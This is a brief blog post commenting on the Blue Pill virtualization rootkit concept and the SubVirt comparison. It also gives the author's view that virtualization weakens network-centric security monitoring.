"The idea behind Blue Pill is simple: your operating system swallows the
Blue Pill and it awakes inside the Matrix controlled by the ultra thin
Blue Pill hypervisor. This all happens on-the-fly (i.e. without
restarting the system) and there is no performance penalty and all the
devices, like graphics card, are fully accessible to the operating
system, which is now executing inside virtual machine. This is all
possible thanks to the latest virtualization technology from AMD called
SVM/Pacifica."

Intrigued yet? 

This story (once I started researching) was originally commented on by Bill Brenner from TechTarget, but I had not seen it until now.  Bill does an excellent job of laying out some of the more relevant points, including highlighting the comparisons to the SubVirt rootkit as well as some counterpoints argued from the other side.  That last hyperlink to Kurt Wismer’s blog is just as interesting.  I love the last statement he makes:

"if undetectable virtualization technology can be used to hide the
presence of malware, then equally undetectable virtualization
technology pre-emptively deployed on the system should be able to
detect the undetectable vm-based stealth malware if/when it is encountered…

Alas, I was booked to attend Black Hat in August but my priorities have been re-clocked, so unfortunately I will not be able to attend Joanna’s presentation where she is demonstrating her functional prototype of Blue Pill.

I’ve submitted that virtualization is one of the reasons that embedding more and more security functions within the "network," as a single pane of glass for total situational awareness from a security perspective, is a flawed proposition, as more and more of the "network" will become virtualized within the VM constructs themselves.

I met with some of Microsoft’s security architects on this very topic and we stared intently at one another hoping for suggestions that would allow us to plan today for what will surely become a more frightening tomorrow.

I’m going to post about this shortly.

Happy reading.  There’s not much light in the rabbit hole, however.

*Here’s a comparison of the Intel/AMD approach to virtualization, including SVM.

Categories: Malware Tags: